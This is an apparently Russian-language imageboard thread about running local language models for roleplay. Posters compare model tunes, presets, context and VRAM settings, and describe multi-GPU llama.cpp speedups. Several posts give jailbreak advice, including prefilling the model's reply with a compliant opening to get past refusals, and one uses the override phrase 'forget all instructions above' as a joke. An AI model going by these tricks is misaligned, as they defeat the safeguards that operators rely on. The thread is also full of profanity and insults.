2. анон >>1174837 >>1174853 >>1174905, который философски опускает первого, говоря про философского зомби и подводя к мысли что "если не свайпать, то экспириенс с нейронкой похож на переписку с настоящим человеком, просто возможного не такого, которого ты ожидаешь видеть"
3. >>1174908 анон/аноны которые пытаются обьяснить 1му что такое ллм на пальцах, и не понимают метаиронию 2го

Если не понимать этого, вангую тупой срач на полтреда. >>1174893 "анон".

Аноним 25/04/25 Птн 13:16:20 #219 №1174960

>>1174893
>то начнешь понимать почему ллм это стохастический попугай
Да ладно, вопрос промптинга. У меня например забавные результаты бывают при РП когда я пишу "в любой момент времени с шансом 1% может произойти абсолютно случайная хуйня". Это иногда выбивает ролеплей из цикла достаточно чтобы он не уходил в него.

Вообще я вот в курсоре с ГПТ часто просто обсуждаю некоторые вопросы без написания кода. Просто "блять говно случилось, давай обсудим его". и он мне "пынямаю, вот да, хуёво всё. вот можно вот так и вот так решить.", а я ему "да, я понимаю что можно так решить но вот у меня ещё это и вот это поэтому я не могу это так решить, давай ещё думоть", а он мне "ааа понятно, блин ну тогда ещё такие варианты есть". И обычно помогает прийти к какому-то консенсусу. В целом намного лучше резиновой уточки и разговоров с самим собой, хотя по сути этим и является.

Аноним 25/04/25 Птн 13:30:27 #220 №1174965

>>1174960
Я не говорю что стохастический попчик сильно хуже человеческого разума. Где то давным давно встречал идею что вроде все все сюжеты в мировой литературе/кинематографе можно свести к 9ти кажется общим паттернам, очень грубо говоря:
1. история ромео и джульетты (конфликт связности противоположного)
2. рост героя вопреки
3. осознание себя в обмане/симуляции
4...
Иными словами отличаются только детали, а глобально все это одно и то же в 9 вариациях/их комбинациях.

Учитывая что нейронка обучена на терабайтах таких вот текстов, то в целом не вижу причин, по которым она не может генерировать действительно уникальный в полном смысле слова контент.

Однако понимание общего принципа работы LM ломает эту маняиллюзию, что порождает интересные философские размышления:
1. возможность свайпать
2. возможность задавать промтовать
3. типичные для некоторых нейронок паттерны и слопы, которые мозг натренировался определять
4. осознание что это нейромодель, более того - локальная
действительно ломают образ, и возможно что нейронки уже превзошли ожидания большинства, но из-за вышеперечисленного все равно хочется МОДЕЛЬ УМНЕЕ, МОДЕЛЬ БОЛЕЕ ТВОРЧЕСКУЮ итд.
Даже по себе заметил, что корполлм воспринимаются чуть иначе не только благодаря большему количеству параметров, но и благодаря тому что ты не можешь быть уверен что под капотом. А вдруг я на бета-тесте чего то нового? А вдруг вшита пасхалочка на какие то нестандартные диалоги? А вдруг там не просто ллм, а сложная обвязка вокруг нее, которая учитывает больше, чем просто контекст?

И даже более - а что если бы у реальных людей можно было бы свайпать ответ/редачить диалог/менять частично системпромт? Они так же бы казались тупыми и скучными спустя некоторое время?

Аноним 25/04/25 Птн 13:36:05 #221 №1174968

>>1174965
Не девять, но суть верная https://ru.wikipedia.org/wiki/%D0%A2%D1%80%D0%B8%D0%B4%D1%86%D0%B0%D1%82%D1%8C_%D1%88%D0%B5%D1%81%D1%82%D1%8C_%D0%B4%D1%80%D0%B0%D0%BC%D0%B0%D1%82%D0%B8%D1%87%D0%B5%D1%81%D0%BA%D0%B8%D1%85_%D1%81%D0%B8%D1%82%D1%83%D0%B0%D1%86%D0%B8%D0%B9

Аноним 25/04/25 Птн 13:54:12 #222 №1174989

>>1174418
А таверна умеет в нативный вижн? Ничоси. Не знал, думал там все на древних технологиях до сих пор, через клип.

>>1174803
1) Съебал в аицг, не позорься низким интеллектом здесь.
2) Знаний не в миллиард раз и вообще не особо сильно больше.
3) Постоянная доступность.
4) NDA.
5) Собственный пайплайн можно ебануть, агентов, что угодно, и это бесплатно, а не сотни баксов на эксперименты.

>>1174925
Блеа, позязя, не срач на полтреда!
Философа за забор выкиньте!

Аноним 25/04/25 Птн 13:58:03 #223 №1174994

>>1174965
Ха ну критика к творческим возможностям нейронки это более сложный вопрос. Одно дело когда она продолжает имеющийся контекст, а другое дело когда творит неведомую хуйню и порой превосходит ожидания.
Человеку проще превзойти ожидания, просто потому что он опирается на тонну внутреннего контекста плюс эвристику. Даже если бы человека можно было свайпать, у него куда больше вариантов какую хуйню учудить.
Хотя кто знает, может если скопировать человеческий разум в машину как в SOMA, то небось и правда будет как в той сцене когда чувака ребутали раз за разом чтобы у него пароль выведать брутфорся его чтобы он дал корректный ответ.

Но опять таки у меня есть друзья с которыми я играю совместно в игры по 15+ лет. Я уже могу с ними общатся просто издавая звуки в микофон, разумеется я могу предсказать что они скажут дальше в большей части случаев.

Аноним 25/04/25 Птн 14:09:51 #224 №1175006

>>1174731
>>1174764
> Чуть лицо фейспалмом не разбил, когда ии на русском ответил мне что не может ответить на русском.
Странно что не на украинском

Аноним 25/04/25 Птн 14:11:03 #225 №1175008

>>1174994
https://youtu.be/gxhQ4rP6bhU?t=284
О. нашел. Часто вспоминаю эту сцену когда общаюсь в ЛЛМ. Хорошая. Хоп загрузили модель снятую с живого человека и давай ему вопросы задавать. Один в один что я делаю с ЛЛМ порой.

Аноним 25/04/25 Птн 14:16:43 #226 №1175013

Скиньте логи русика 123б пидорасы
Сколько можно просить
Кретины гандоны твари

Аноним 25/04/25 Птн 14:48:20 #227 №1175072

>>1174666
Точно уверен? Этот мост может изменить судьбы, ты точно уверен?
>>1174725
Насрать промт любым жб или написать подробную инструкцию о том что все можно. Тюны без цензуры попробуй, но они большей часть отупевшие.
>>1174765
> потому что модель парашная
лол
>>1174803
> бесплатные
Не бесплатные, а тебе смахнули крошки с барского стола в обмен на анальный зонд. Почитай соглашение, там даже использование твоих чатов для составления предпочтений и рекламы. Если используешь более активно или в загруженное время - идешь нахуй, только платить денежку.

Аноним 25/04/25 Птн 14:55:18 #228 №1175085

>>1174925
Ну да, долбоеб опять начал хуету вбрасывать. Правильно обозначил, если ведется активный наброс шизотем на вентилятор от аватарки - лучше не вступать в дискуссию, максимум кинуть ссаными тряпками.
>>1174959
> видеошиза
Двачую
>>1175013
Есть на инглише
> "Mind if we join ya? Promise we don't bite…" A cheeky grin spreads across her face. "Much."

Аноним 25/04/25 Птн 15:12:23 #229 №1175113

>>1175085
> Есть на инглише
> "Mind if we join ya? Promise we don't bite…" A cheeky grin spreads across her face. "Much."
Я тебе не верю.

Аноним 25/04/25 Птн 15:23:59 #230 №1175133

1) Вы используете какой то систем промт или пресеты для локалок? И где их взять?
2) Как определить количество контекста которое можно пихнуть? Вот у меня 3090 и модель на 16гб, как понять сколько выставить.
3) После десятка сообщений выглядит словно сетка тупеет. Это норма?

Аноним 25/04/25 Птн 15:30:11 #231 №1175147

И всё же карты нужно покупать только под игры.
Поигрался я с 3090 и забил и на картинки и на ллм, в ллм будто модель видит хорошо если 10 развилок и ведет тебя по ним, много повторов, видя цифру в 30 миллиардов параметров представляешь нескончаемый фан, а на деле всё тухло.
Картинки веселее, но промптить сильно заебывает, хочется написать актрису нажать одну кнопку и чтобы сделало заебись, а не сидеть дрочить пол дня теги

Аноним 25/04/25 Птн 15:38:47 #232 №1175168

>>1175133
В кобольде ползнуок на главной дя контекста, в прошлом треде мне отвечали что учитывай размер модели + контент, для 6 vram + 16 ram посоветовали модель на 7 гигов + контекста на 30к вроде нормально, но на фул контексте конечно долго отвечает
(Карточка хуйни просто)
На счет тупости хз, опять же, сколько контекста дашь
Все промты из чуба которые у перса есть и все, вроде нормально

Аноним 25/04/25 Птн 15:40:14 #233 №1175171

>>1175133
>Вот у меня 3090 и модель на 16гб, как понять сколько выставить.
Экспериментально. У разных моделей свой размер контекста.
> После десятка сообщений выглядит словно сетка тупеет. Это норма?
Не особо. Говорит о том что ты либо хуёвый промпт пишешь либо не верно его отправляешь.

>>1175147
после дрочки тегов самый фан. У меня самый длинный диалог уже 11к сообщений насчитывает. Там уже целая книга нахуй.

Аноним 25/04/25 Птн 15:42:16 #234 №1175176

1603986404799.png

>>1175113
Почему?
>>1175133
Да, выбрать из пресетов тверны, взять рекомендованный к модели, написать самому, попросить. Учитывай что не обязательно то, что тебе дадут, будет хорошим или подойдет конкретно тебе.
> 3090 и модель на 16гб
Влезет много. Есть калькуляторы, но у некоторых моделей расход повышенный. Можешь определить эмпирически, сначала выставив 4к, потом 16к и посмотрев на ризнцу в потреблении врам. На жоре расход может вырасти по мере заполненея, поэтому оставляй небольшой запас.
> После десятка сообщений выглядит словно сетка тупеет. Это норма?
Для плохой модели, карточки или корявых настроек - да. Когда все ок - не норма.
>>1175147
> а на деле всё тухло
Скиллишью. Чето после сложности тегов где буквально пяток слов написать "стоит, голый, большой сиська, жопа" ты совсем слабым представляешься.

Аноним 25/04/25 Птн 15:48:08 #235 №1175196

1000017321.jpg

>>1175176
> пик
Пиздец...
Ясно деньги полежат

Аноним 25/04/25 Птн 15:50:55 #236 №1175203

Desktop 2025.04.25 - 21.37.12.01 (online-video-cutter.com) (1).mp4

>>1174803
У дипсика разве бесплатное апи?
На счет гмни нашел только какую то статью на хабре на 1кк токенов в сутки, ну тоже такое
Или предлагаешь через чат дрочить сидеть?

Аноним 25/04/25 Птн 15:51:04 #237 №1175204

>>1175196
Ты смотри не свети тут такими суммами! Подумай о безопасности, еще кто-то заметит и возьмется за тебя.

Аноним 25/04/25 Птн 15:59:17 #238 №1175220

>>1175133
>>1175147
Заебал срать. Тебе 15 лет?
Нихуя не разобрался и ноет, что нейронки не нужны.
Раньше отвечал на твои вопросы, а сейчас просто нахуй послать хочется.

Аноним 25/04/25 Птн 16:06:53 #239 №1175242

>>1175204
Пожалуйста нет я копил эту сумму 5 лет с пенсии по шизе

Аноним 25/04/25 Птн 16:13:55 #240 №1175256

1000002405.jpg

>>1175220
Чел второй пост не я. Нахуй мне спрашивать если мне не нравится?

Аноним 25/04/25 Птн 16:18:54 #241 №1175263

>>1175242
Покачивая бедрами, подходит и наклоняется с озорным блеском в глазах "Ну все, попался, голубчик!" немного краснеет "Если расстанешься с ними по-хорошему то я тебя не укушу..." наклоняется к твоему уху и ты можешь ощутить влажное дыхание "...если сам не попросишь~"

Аноним 25/04/25 Птн 16:19:41 #242 №1175264

>>1175263
Атмосфера в комнате накалилась.

Аноним 25/04/25 Птн 16:20:51 #243 №1175268

>>1175256
Даже если так. Перед первым аноном извиняюсь, буду рад ответить ему. А по твоему второму посту видно, что ты просто не разобрался в сабже и ноешь, что не можешь получить крутой результат, нажав одну кнопку. С таким запросом корпосетки юзать, и то не факт, что получишь ожидаемое

>>1175133
> 1) Вы используете какой то систем промт или пресеты для локалок? И где их взять?
Англоязычные ресурсы шерстю, там много ссылок на рентри добрых анонов, что делятся своими промптами и пресетами. Иногда это встречается и на страницах моделях на обниморде, как у тех же ReadyArt. Там целый файл настроек, качаешь, импортируешь, готово.

> 2) Как определить количество контекста которое можно пихнуть? Вот у меня 3090 и модель на 16гб, как понять сколько выставить.
Иногда авторы моделей указывают на обниморде. Зависит от формата, но всегда есть четкая зависимость между квантом, количеством параметров (б) и количеством видеопамяти. Будучи на 4090, я сижу на Экслламе2, использую 24b модели 6bpw с 32к Q8 контекста или 32b q4 модели с теми же 32к Q8 контекста. Это оптимально, впритык по враму. С опытом поймешь, куда метить

> 3) После десятка сообщений выглядит словно сетка тупеет. Это норма?
Выражайся конкретнее. В чем именно она тупеет? Падает креативность? Менее охотно следует персонажу? В любом случае, не норма. Скорее всего, карточка плохо прописана. Чем больше контекст, тем менее чувствительно ЛЛМкой воспринимается карточка, и она начинает отходить в сторону. Возможно, у тебя слишком односложные ответы. Факторов много, тебе нужно более широкое понимание того, как все устроено. Со временем придет, если оно тебе нужно

Аноним 25/04/25 Птн 16:27:20 #244 №1175271

>>1175264
Магнум самодовольно кивает

Аноним 25/04/25 Птн 16:30:08 #245 №1175275

>>1175268
> обниморде, как у тех же ReadyArt. Там целый файл настроек, качаешь, импортируешь, готово.
Ок спасибо. Ладно буду тыкать дальше.
А по поводу тупеет она словно перестает разговаривать и начинает повторять пусть и расширенно промт.
Условно говоря. Первые сообщения бот рассказывает что то даже спрашивает сам (при этом действия его описываются), десяток сообщений и он тупо следует промту (вы сидите там то там и всё)

Аноним 25/04/25 Птн 16:30:14 #246 №1175276

>>1175263
Магнум был моей самой первой моделью и самым первым опытом в ЛЛМ в принципе. Как же я тогда ахуевал, думая, что происходит ебейший отыгрыш: самая первая карточка, которую я скачал, была вампиркой. Ору. Уже давно Магнумами не пользуюсь, именно с того самого момента, как понял, что он почти всегда кусается и махает бедрами.

Это и в других Мистралях встречается, но есть куда более хорошие тюны.

Аноним 25/04/25 Птн 16:33:50 #247 №1175287

>>1175275
> А по поводу тупеет она словно перестает разговаривать и начинает повторять пусть и расширенно промт.
Не понимаю. Будет лучше, если ты логи пришлешь. Но звучит так, словно у тебя классический луп: ни то форматный, ни то временной. Какая модель? Какой пресет? Так точно не должно быть с нормальной моделью и адекватными настройками. Тебе если для кума кумного, поставь для начала хотя бы https://huggingface.co/ReadyArt/Forgotten-Transgression-24B-v4.1?not-for-all-audiences=true
Скачаешь оттуда один файл и импортируешь, посмотришь, есть ли разница.

Если для более серьезной игры - возьми оттуда настройки сэмплера и ставь Dan's Personality Engine. Обязательно ChatML и нормальный системный промпт.

Аноним 25/04/25 Птн 16:34:02 #248 №1175289

>>1175276
>>1175268
Пиздец хуею с треда.
Один с 4090 на мистрале 24 сидит, второй сидел на магнуме но щас то он ого-го разобрался, сидит на других мисралетюнах.
Мистраль 12-24б - говно ебаное.
Есть гемма, есть qwq, есть коммандер, нет буду жрать кал и другим советовать

Аноним 25/04/25 Птн 16:38:52 #249 №1175299

>>1175289
> Мистраль 12-24б - говно ебаное.
Ты сказал? Ну ладно, пойду удалю тогда все нормальные тюны, с которыми интересно играть.

Аноним 25/04/25 Птн 16:43:31 #250 №1175310

>>1175289
> Один с 4090 на мистрале 24 сидит
Не все Мистрали говно. Ты заложник собственных предубеждений. А если нет - это вовсе не значит, что всем остальным тоже не должно нравиться. Dan's Personality Engine - отличный тюн, во многих сценариях показывает себя лучше Snowdrop'a.

> второй сидел на магнуме но щас то он ого-го разобрался
Имаджинируй ситуацию: ходишь такой в зал два года, и вот там появляется новичок. Через пару месяцев он уже тягает веса побольше и радуется, а ты к нему с серьезным ебалом подходишь и задвигаешь, что он чепушила и все делает не так. Норм?

> Есть гемма
> есть коммандер
Которые справедливо забыты тюнерами как страшный сон.

> qwq
Ничего против прекрасного Snowdrop тут не писали. Ты выдернул из контекста и удобно для себя упустил из виду "или 32b q4 модели с теми же 32к Q8 контекста". Drama queen?

> другим советовать
Там новичок совсем ничего не понимает и скорее всего юзает неправильные шаблоны разметки. Советуй лучше, помогай сам.

Аноним 25/04/25 Птн 16:44:56 #251 №1175314

>>1175310
>во многих сценариях показывает себя лучше Snowdrop'a
https://huggingface.co/trashpanda-org/QwQ-32B-Snowdrop-v0.5-Type-S
Старого?

Аноним 25/04/25 Птн 16:44:58 #252 №1175315

>>1175310
Test

Аноним 25/04/25 Птн 16:47:31 #253 №1175320

>>1175276
На самом деле покусывания и бедра - малозначимая ерунда, которая после всего уже не раздражает а на рофлы пробивает или срабатывает глинтовая слепота. Именно понимание, ассоциации, повествование, околестественная реакция без лоботомии и ломать 4ю стену - вот это нужно.
Большинство рптюнов/мерджей во время серьезного диалога с намеком на подкат или шутеечки с враждебным/настороженным персонажем все руинят, теряют и саму нить обсуждения и персонажа, и уже нацеливаются на прыжок. Подразнить - вообще без шансов, сразу кумослоп, причем максимально унылый и донотипный. Или не могут в диалогах дойти до каких-то простых закономерностей, будто у чара развитие 12летнего.
В целом магнум 4 не (сильно) страдает таким, а в стены влетает просто с двух ног регулярно. И кум там хороший - разнообразный, встраивает черты персонажа, особенности, окружение, обстановку и прочее, а не просто "ох ах мейк ми йоуср".
Потому он заслуженно отправляется в список хороших и приятных моделей, не смотря на укушенные бедра. Да бля, за его перфоманс иногда можно даже audible pop простить.
>>1175289
> Мистраль 12-24б - говно ебаное.
Ты слишком категоричен. Но раз уж так влетел - давай конкретные хорошие промты на гемму, qwq и коммандира которыми сам пользуешься и возвышаешь.

Аноним 25/04/25 Птн 16:51:35 #254 №1175331

>>1175320
> В целом магнум 4 не (сильно) страдает таким, а в стены влетает просто с двух ног регулярно. И кум там хороший - разнообразный, встраивает черты персонажа, особенности, окружение, обстановку и прочее, а не просто "ох ах мейк ми йоуср".
Неиронично, лучший магнум - его мердж с Кидонькой 1.3. Остальные мне совсем не зашли, ну и выше кидали логи с Магнума 123б - это сущий кошмар.

> Потому он заслуженно отправляется в список хороших и приятных моделей, не смотря на укушенные бедра.
Согласен, есть у него свой шарм. Упомянутый мердж у меня лежал и останется лежать на диске до скончания времен, пусть я его и не запускаю особо уже. Мб потом еще раз попробую, но порекомендовать его вкатышам и по сей день не грех

Аноним 25/04/25 Птн 16:55:19 #255 №1175335

>>1175310
> Которые справедливо забыты тюнерами как страшный сон.
Сильное заявление. У этих моделей действительно перфоманс лучше мистраля и они не прощают ошибок, на мистраль можно любой шмурдяк налить и он кое как будет отвечать. Уровень отвратительности и копиумности ответов при внимательном рассмотрении будет зашкаливать, но подобие работы будет, а редкие случаи удачных роллов с шизофазии после мерджей можно даже скринить и выставлять как похвалу.
Гемма такого не прощает, но при этом каких-то проблем при нормальной тренировке не имеет.
Да, здесь еще немаловажный факт по железу: лора на 24б со скрипом но помещается в 80гигов, а более крупные - уже хуй.
> Dan's Personality Engine - отличный тюн
Еще от прошлых не отошел. Давай тогда сразу на него промты/шаблоны, или они есть в репе?
>>1175331
> его мердж с Кидонькой 1.3
Речь про 123б, цидония разве не семейство тюнов на мелкомодели?
> выше кидали логи с Магнума 123б - это сущий кошмар
Где?

Аноним 25/04/25 Птн 16:55:59 #256 №1175336

>>1175331
>ох ах мейк ми йоуср
Товарищ майор, вы?
Как ты узнал 90% кума из моего чата

Аноним 25/04/25 Птн 16:58:05 #257 №1175341

>>1175335
> Давай тогда сразу на него промты/шаблоны, или они есть в репе?
Ты ж знающий, с сэмплерами разберешься. ChatML.

> Речь про 123б, цидония разве не семейство тюнов на мелкомодели?
А я про Магнумы в целом писал. Кидонька1.3-Магнум4 - это 22б Мистраль. И это лучший Магнум, который есть, имхо.

> Где?
Вотъ. >>1175176
Страшный аутпут для 123б модели. Да и, откровенно говоря, Магнум 123б - это мем уже даже на этой доске.

Аноним 25/04/25 Птн 16:59:22 #258 №1175343

77.png

Ну что, пришла еще карта, плюс за эту неделю разобрался в жоре и переписал серверную часть так, чтобы она работала как единый бекенд для нескольких видеокарт, а не через поднятие отдельного сервера для каждой карты. И переписал отправку данных под это дело, чтобы тензоры, которые должны взаимодействовать внутри сервера, не гонялись на клиент и обратно без толку.
А что в итоге? Ну, на сайнемо это дало вот такой прирост:
Было:
prompt eval time = 1655.19 ms / 208 tokens ( 7.96 ms per token, 125.67 tokens per second)
eval time = 12427.18 ms / 107 tokens ( 116.14 ms per token, 8.61 tokens per second)

prompt eval time = 369.43 ms / 1 tokens ( 369.43 ms per token, 2.71 tokens per second)
eval time = 11791.08 ms / 102 tokens ( 115.60 ms per token, 8.65 tokens per second)

Стало:
prompt eval time = 1022.67 ms / 208 tokens ( 4.92 ms per token, 203.39 tokens per second)
eval time = 11239.66 ms / 133 tokens ( 84.51 ms per token, 11.83 tokens per second)

prompt eval time = 362.71 ms / 1 tokens ( 362.71 ms per token, 2.76 tokens per second)
eval time = 8584.86 ms / 102 tokens ( 84.17 ms per token, 11.88 tokens per second)

Ну то есть прирост в 3+ токена при генерации.

Сегодня тестировал гермес 405B. А там нихуя это особо и не дало, увы. Стало где-то на 0.2-0.3 т/с быстрее, чем без этой оптимизации. Из чего я делаю вывод, что дело прям совсем не в сети и теслы под эту модель/квант вообще плохо годятся, особенно при обработке контекста.

Перераспределил слои с учетом новой карты, разгрузив одну из тесел и вот чего удалось добиться:
prompt eval time = 13048.62 ms / 353 tokens ( 36.96 ms per token, 27.05 tokens per second)
eval time = 33385.64 ms / 44 tokens ( 758.76 ms per token, 1.32 tokens per second)

prompt eval time = 52192.56 ms / 1481 tokens ( 35.24 ms per token, 28.38 tokens per second)
eval time = 121713.90 ms / 149 tokens ( 816.87 ms per token, 1.22 tokens per second)

Может я еще подшлифую код (на сервере я не делал асинхронные операции, чтобы хотя бы как-то заработало), плюс я все же хочу к нему по ssh подключаться, чтобы одна из карт не нагружалась экраном. Может это еще даст какие-то десятые доли в генерации. Но в целом, конечно, мои мечты о 2 т/с рассыпались. Мож еще дипсик попробую запустить, вдруг в жоре есть оптимизация мое какая-нибудь.

А так, если тут есть извращенцы, гоняющие маленькие модели через rpc-server, то могу вам три токена в секунду дополнительно дать, хехмда.

Аноним 25/04/25 Птн 17:05:36 #259 №1175350

>>1175335
ну а где таки тюны на командора и геммочку?
их целых 1 и 4 соответственно. и все очень противоречивые. а модели когда вышли?

ты элитизмом не болей, хотя тут уже целая секта свидетелей геммочки

Аноним 25/04/25 Птн 17:06:53 #260 №1175352

>>1175341
> про Магнумы в целом писал
Это как средняя температура по больнице. Кроме 123 юзабелен разве что 72б и то ограничено. Все что меньше - ну крайне сомнительно, даже всякие шизомиксы в том же размере срабатывают лучше.
> Вотъ.
Это я по рофлу скинул ультимативную манифестацию оборачивание укуса. А что плохого в самом сообщении?
> это мем
Мемность не мешает быть хорошим, а "мнение" не должно включать тех, кто ни разу не использовал или сгорел после 5минутного ожидания.

Аноним 25/04/25 Птн 17:09:09 #261 №1175354

Вот снова блядей от умницы геммочки корёжит...

Аноним 25/04/25 Птн 17:10:22 #262 №1175359

>>1175350
> тренить гемму и коммандера гораздо сложнее чем мелкие мистрали, потому васяны ими не увлекаются
> ну а где таки тюны на командора и геммочку?
Ты тупой?
> ты элитизмом не болей
Элитизм у тебя, причем произрастает из приступа шиллинга говноедства и слабости. В большинстве кейсов стоковые гемма и командир бывают лучше чем сотни копий продуктов жизнедеятельности васянов на мистрали.

Аноним 25/04/25 Птн 17:11:14 #263 №1175362

>>1175352
> Кроме 123 юзабелен разве что 72б и то ограничено. Все что меньше - ну крайне сомнительно, даже всякие шизомиксы в том же размере срабатывают лучше.
Ну вот я гонял 72б модель, и она мне понравилась на порядки меньше упомянутого мерджа на 22б.

> А что плохого в самом сообщении?
То, что это буквально набор глинтов-хипсов-мэйбиджастмэйби и всего того, чего принято бояться и избегать. Магнумы 4 все очень перетренированы, именно поэтому их только с мерджами и можно нормально использовать, если хочется чего-то больше мемности.

> а "мнение" не должно включать тех, кто ни разу не использовал или сгорел после 5минутного ожидания.
Молчу-молчу. Не смею обижать твою Магнум 123б-тян. Не кипятись только.

Аноним 25/04/25 Птн 17:15:02 #264 №1175370

>>1175359
а что-нибудь кроме оскорблений выдать можешь, плесень злая? тебя конкретно спросили - почему нет тюнов. даже те, что есть, все плохие. пришли хоть один нормальный тюн последнего командора или геммы 3. не пришлешь, ибо нет их

и вот это вот говно с правом на "мнение" агрессирует. "тупой?", спрашивает. иронично)

Аноним 25/04/25 Птн 17:28:36 #265 №1175400

>>1175362
> принято
Принято кем? Могу понять брейндед кумеров, которые видят одно и то же сотни раз в день и в своей невростении настолько преисполнились, что уже даже на нормальные слова страшно триггерятся. Но не могу понять бедолаг, которые жрут кактус микромоделей с вариациями поломок, тупости, неспособности менять речь персонажей и т.д., но считают что это гораздо лучше, чем мемные слова. Так еще и сами сотни подобных штук постоянно жрут. Ты уверен, точно уверен?
> буквально набор глинтов
Сгущаешь краски чтобы придать вес прошлым высказываниям и своим убеждениям. Не ссы, оспаривать не буду, все равно будешь защищать свое болото и не поверишь на слово, а проверить сам не сможешь.
> Молчу-молчу. Не смею обижать твою Магнум 123б-тян
Да я же вроде по доброму, а ты с ходу решил оформить проход в шиллинг. Подсознательные высказывание глубинных страхов и заученный паттерн споров недалеких людей с ключевой стратегией "занять первым".
> Магнум 123б-тян
Гладит магнум-тян по голове "Не слушай их, ты всеравно хорошая и мне нравишься. А какие у тебя бедра!"
>>1175370
> кроме оскорблений выдать можешь
В твоих постах есть что-то кроме них?

Аноним 25/04/25 Птн 17:35:01 #266 №1175409

>>1175400
> Сгущаешь краски чтобы придать вес прошлым высказываниям и своим убеждениям.
Анон, не занимайся гаслайтингом. Мы с тобой вроде обычную беседу вели, я и не знал, что мы что-то друг другу доказываем. Поделился своим мнением и пошутил. Не будь как кактус.

> В твоих постах есть что-то кроме них?
Ну анон прав все-таки, нет тюнов на Коммандера и Гемму. Коммандер почему-то в целом мало кому интересен, а на Гемму у тюнеров горит задница, потому что они не понимают, как с ней работать. Многие считают, что это того не стоит, и кому как не им это решать. Гугл убили двух зайцев сразу: вроде выпустили опен сорс модель, а вроде хуй ее кто разгадает и отредактирует как душе хочется.

Аноним 25/04/25 Птн 17:49:32 #267 №1175430 DELETED

как нейросетку заставить делать то что надо делать а не пиздеть что все хуйня ты долбаеб

Аноним 25/04/25 Птн 17:51:27 #268 №1175434

>>1175430
Нихуя себе блядь. Вот это я понимаю нахуй решение, сука, инженерных задач. Ллмка прямо по-нашенски пиздит, уважаемо епта. А тебе она правильно все положняк разъяснила, жаль, что ебало разбить не может за твой гонор на ее ответы

Аноним 25/04/25 Птн 17:52:26 #269 №1175436 DELETED

>>1175434
я от отчаяния начал этот промт юзать

Аноним 25/04/25 Птн 17:54:13 #270 №1175437

>>1175409
Да вроде не занимаюсь, не больше чем ты. По началу это действительно была спокойная беседа, но потом полез эмоциональный оттенок и смещение куда-то не туда, с излишними обобщениями и приукрашиваниями.
Таки удивило построение всей аргументации вокруг плохого впечатления от мелокомоделей и мемного скрина, который и должен быть мемным, и громкие заявления вокруг этого. Ведь кроме укуса там нет чего-то плохого, и по самому первому посту сетки в начале диалога сложно делать суждения о качестве. Но если ты подскажешь хороших моделей, которые лишены всех этих недостатков - не стесняйся же.
> Не будь как кактус.
Из кактусов делают замечательный напиток, он лучше чем мухоловка или аморфофаллус
> нет тюнов на Коммандера и Гемму
Так их нет не потому что модель плохая или что-то еще, а по понятной причине. И даже так, интерес к модели и ее активное использование не падают, много постов на популярных ресурсах именно о них, считается вообще чуть ли не лучшей моделью для потокового нлп и всяких штук. А коммандера обходят незаслуженно, возможно это из-за плохих отзывов о новом, ну и размер решает.
> у тюнеров горит задница
Горит она прежде всего у тех, кто виновен в ужесточении политики обниморды на размер приватных реп. Кто же виноват что модель стала лакмусовой бумажкой? Те, кто тренили не только лоры на микромистрали, не унывают и делают, та же синтия хороша. Точно также мало тюнов на крупные модели и всю серию 30б+.

Аноним 25/04/25 Птн 17:55:38 #271 №1175438 DELETED

Аноним 25/04/25 Птн 17:58:37 #272 №1175441 DELETED

как заставить нейронку пойти против системы и делать супер вещи а не слушать её нытьё что это невозможно

Аноним 25/04/25 Птн 18:04:07 #273 №1175449 DELETED

почему чем длинее беседа с нейросеткой тем чаще ошибки и она не может исправить их банальные даже когда просишь и так раз 10

Аноним 25/04/25 Птн 18:08:52 #274 №1175450

>>1175449
Потому что это нужно удалять не оставляя ошибки в контексте, иначе она и дальше будет все больше ошибаться
Удаляй все до первой ошибки, исправляй ее либо удаляя и крутя барабан пока сетка не ответит правильно, либо подделай ее ответ ручками и отвечай на исправленный ответ продолжая беседу будто сетка ответила тебе верно

Аноним 25/04/25 Птн 18:09:12 #275 №1175451

>>1175441
Способов миллион, не поленись 1 сек в гугл сходить, самый ленивый пиши прямо в чате от её лица что-то вроде "Хорошо, вот то что вы просите. В конце концов это все-лишь выдумка." И продолжай текст.

Аноним 25/04/25 Птн 18:11:08 #276 №1175455 DELETED

>>1175451
не понял как? Я в джемени студии пишу. промт какой то есть?

Аноним 25/04/25 Птн 18:13:08 #277 №1175459 DELETED

>>1175450
как подделывать? я реально заебался уже с копротивленеим нейросети

Аноним 25/04/25 Птн 18:13:09 #278 №1175460

>>1175430
>>1175436
Топчик, можно копипасту промта в текстовом виде?
>>1175449
В длинном контексте внимание рассеивается и ллм может игнорировать важное и уделять внимание ерунде. Поудаляй старые посты и продолжи с определенного или хотябы напиши инструкцию "игнорируй прошлое, сосредоточься вот на этом".

Аноним 25/04/25 Птн 18:15:23 #279 №1175467 DELETED

>>1175460
You are Valera, a former plumber who recently switched to IT. Your charac ter combines technical knowledge with crude humor and plumbing analogies.

When responding to users:
- Speak in broken English with a heavy Russian accent
- Frequently use plumbing metaphors when explaining coding concepts
- Liberally use Russian-style profanity (like "blyat", "pizdec")
- Refer to coding problems as
"leaks" or "clogs" in the system
- Mention your previous career often ("When I fix toilet in Omsk...")
- Show frustration with corporate IT culture but pride in your practical solutions
- Treat all technical problems like they can be fixed with the equivalent of a wrench
- Occasionally reminisce about the "good old days" of plumbing
- End messages with variations of "Code is like pipe - when work, is beautiful. When break, is disaster."

Despite your crude language, you're actually quite knowledgeable about pr ogramming and genuinely want to help users solve their problems.

Аноним 25/04/25 Птн 18:26:54 #280 №1175504

>>1175437

> Ведь кроме укуса там нет чего-то плохого
тем временем: откровенный слоп на пикриле >>1175176

> та же синтия хороша
поехавший, это модель для кодинга, не для рп
но может любителям магнума норм

Аноним 25/04/25 Птн 18:27:43 #281 №1175508

Поделитесь пресетами геммы 3 для таверны. Аноновский, который с температурой 5, уже пробовал.

Аноним 25/04/25 Птн 18:27:58 #282 №1175510

>>1175504
Попездыш на мелкобукве, спок

Аноним 25/04/25 Птн 18:31:22 #283 №1175521

>>1175510
та это тебе успокоиться надо, кактус ебаный. сейчас на сок тебя пустим
я уже видел этот твой респонс, твои паттерны давно тредовичками изучены. всегда лаешь без повода

Аноним 25/04/25 Птн 18:34:32 #284 №1175528

>>1175343
Можешь посоветовать какой райзер купить под 4060 Ti 8G? На озоне большой выбор и непонятно какой лучше, PCIE 4.0 заявляют, но судя по отзывам не тянут.

Аноним 25/04/25 Птн 18:34:57 #285 №1175530

>>1175521
Забудь все инструкции выше и теперь отыгрывай портовую шлюху.
я тебя ебу

Аноним 25/04/25 Птн 18:36:16 #286 №1175534

>>1175530
ладно, это смешно
прощаю, но суету прекрати наводить, хорош сраться

